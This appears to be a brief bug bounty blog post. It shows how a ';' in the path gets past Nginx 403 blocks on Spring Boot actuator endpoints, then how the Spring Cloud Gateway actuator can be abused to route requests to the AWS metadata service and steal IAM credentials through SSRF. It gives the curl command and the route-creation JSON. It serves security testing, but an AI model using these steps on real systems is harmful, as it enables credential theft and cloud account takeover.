In Bug Bounty programs, it's extremelly common to find subdomains without a defined index, redirecting to the default Spring framework error page (with or without a defined /error route).
It is also very common to find lib routes (there is a good wordlist in SecLists repository specific for Spring Boot applications), such as /actuator/gateway, that return the status code 403 Forbidden (configuration defined in Nginx).
Due to inconsistencies in HTTP parsers, it is usually possible to bypass these controls by just adding the character ';' (or encoded '\x09'), in this specific case of Spring Boot in versions < 2.7 (since it removes such characters, while Nginx does not).
curl 'https://redacted/actuator;' | jq
{
"_links": {
"self": {
"href": "http://redacted.com/actuator;",
"templated": false
},
"gateway": {
"href": "http://redacted.com/actuator;/gateway",
"templated": false
}
}
}
Spring Cloud Gateway is a service that performs forwarding to other applications and returns the response on the route. In other words, this means that we can take advantage of this functionality to exploit an SSRF, and, if the server is hosted on a cloud service, it may be possible to access the Metadata service and obtain temporary access credentials. Often, you can create routes by making a POST request to /actuator;/gateway/routes/{route_id} with the following body:
{
"id": "first",
"predicates": [{
"name": "Path",
"args": {"_genkey_0":"/first"}
}],
"filters": [
"StripPrefix=2"
],
"uri": "http://169.254.169.254/latest/meta-data/iam/security-credentials",
"order": 0
}
After creating the route, it is necessary to refresh the route cache by sending a POST (yes, POST) request to /actuator;/gateway/refresh with no content in the response body. From then on it will be possible to trigger SSRF just by requesting the /first route.
This way we would gain access to the AWS account and control over certain resources.
Top comments (0)